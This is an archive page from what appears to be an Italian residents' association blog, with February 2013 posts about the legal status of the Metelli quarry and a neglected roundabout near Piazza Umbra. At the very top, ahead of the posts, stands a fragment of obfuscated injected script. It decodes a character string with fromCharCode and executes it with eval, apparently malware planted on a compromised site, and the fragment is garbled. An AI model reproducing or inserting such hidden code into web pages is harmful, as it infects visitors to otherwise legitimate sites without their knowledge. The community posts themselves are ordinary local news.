q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Archive for Febbraio, 2013

Aggiornamento sulla cava di Metelli

admin Febbraio 16th, 2013

Cari Soci

               Il Commissario Prefettizio, Dr Angelo Gallo Carrabba, mi ha convocato questa settimana per chiarire gentilmente un punto rimasto in sospeso dopo il colloquio avutosi il 17 gennaio con membri del consiglio della Trebis. Dopo aver compiuto delle ricerche, mi ha detto, ha potuto stabilire che la cava Metelli è legalmente una cava attiva, e che la nostra impressione che fosse stata dichiarata una cava dismessa era probabilmente dovuta a un malinteso. L’attuale proroga del contratto per scavare scade nel settembre di quest’anno, ma nel caso che la quantità di materiale da estrarre prevista nel contratto non fosse ancora esaurita, dovrà essere concessa un’ulteriore proroga di due anni. Per quanto riguarda le richieste della ditta 1) di poter scavare più in basso del previsto, e 2) di ampliare la zona estrattiva, ancora non si è deciso. Gli accertamenti necessari per la seconda richiesta impegneranno molto tempo - un anno o forse un anno e mezzo.   Cordiali saluti, Patricia

Rotatoria di Piazza Umbra

admin Febbraio 2nd, 2013

Cari soci

                so che molti soci, io inclusa, lamentano da molto tempo lo stato di abbandono del terreno dentro la rotatoria accanto a Piazza Umbra. Così, dopo l’incontro col Commissario prefettizio il 17 gennaio, abbiamo colto l’occasione per interpellare l’Architetto Bettini (Lavori Pubblici e Urbanistica) sulla situazione. Ci ha spiegato che una soluzione è stata difficile perchè il terreno ha tre proprietari : una piccola striscia è di Trevi, una più grande è di Foligno e un’altra appartiene alla Provincia. Finalmente, comunque, i tre si sono messi d’accordo di incaricare il Comune di Trevi  della gestione del terreno.   Il Comune darà all’amministrazione di Piazza Umbra - la cui direttrice, sembra, è molto ansiosa di vederla sistemata - il compito di abbellirla.  Speriamo  succeda presto!

Aggiornamento sulla cava di Metelli

admin Febbraio 2nd, 2013

Cari soci

               l’incontro, da tempo atteso, di cinque membri del consiglio della Trebis col Commissario Prefettizio, Dr.  Angelo Gallo Carrabba, ha avuto luogo giovedì 17 gennaio (chiedo scusa per il ritardo nel referire). Il Commissario ci ha accolto molto cordialmente, dicendosi felice di avere l’occasione di conoscerci - avendo sentito delle nostre attività in passato - e di essersi informato sul tema della cava Metelli, motivo per il quale abbiamo chiesto l’incontro.

               Gli abbiamo spiegato le nostre perplessità per quanto riguarda la cava, la quale - almeno così ci risulta - doveva essere una cava dismessa, con l’estrazione limitata e finalizzata solo al riambientamento. La chiusura della cava, però, è stata sempre rimandata con  proroghe argomentando che la quantità di materiali previsti non è stata ancora completemente estratta. L’ultima proroga scade nell’ottobre di quest’anno. Nel frattempo i proprietari della cava hanno acquistato, per una cifra molto elevata, parecchio terreno accanto  con l’evidente e manifestata intenzione di ampliarla. Abbiamo chiesto chiarimento sullo stato giuridico attuale della cava. Abbiamo anche chiesto di sapere chi effettua controlli sulle attività di estrazione, quando, e con quali esiti.

               L’Arch. Giuseppe Bettini, responsabile dei Lavori Pubblici e  Urbanistica del Comune, che assisteva il Commissario, ci ha riferito  che il Comune ha ricevuto due richieste da parte dei proprietari della cava. La prima è una richiesta di ampliamento per dare accesso a nuovi giacimenti di materiale. La seconda è una richiesta di variante all’attuale contratto che permetterebbe di scavare ancora più in profondità nel pozzo centrale  di quanto finora previsto. E’ in corso una valutazione di queste richieste. Nessuna decisione è stata ancora presa.

               Da quando, qualche anno fa, molte competenze sulle cave sono state trasferiti alle Province, i controlli e il monitoraggio delle attivita spettano alla polizia mineraria, ci ha detto l’architetto. Finora non ci sono state irregolarità, ma della periodicità dei controlli non sapeva niente e ci ha promesso che si sarebbe informato al riguardo.

               L’architetto considera la cava “a tutti gli effetti” una cava attiva. Ma alla fine siamo usciti dall’incontro senza un’idea veramente chiara sul suo stato effettivo  : è attiva o esaurita?  A tal proposito né i tecnici presenti, né il Commissario hanno saputo rispondere, ma si sono impegnati ad esaminare la cosa attentamente.  Il loro promesso impegno ci è parso sincero. 

               Abbiamo anche sollevato il tema delle varie denunce e lamentele dei residenti della zona vicino alla cava per quanto riguarda l’uso di esplosivi, a volte di primissima mattina, o con una forza allarmante. I nostri interlocutori hanno preso atto  dei nostri commenti.

               Da quello che ci ha detto il Commissario, concludendo la seduta, ci sembra che terrà in considerazione i nostri argomenti quando verrà il momento di prendere decisioni sul futuro della cava. Siamo molto felici di aver avuto l’occasione di portare a conoscenza del Commissario tale argomento.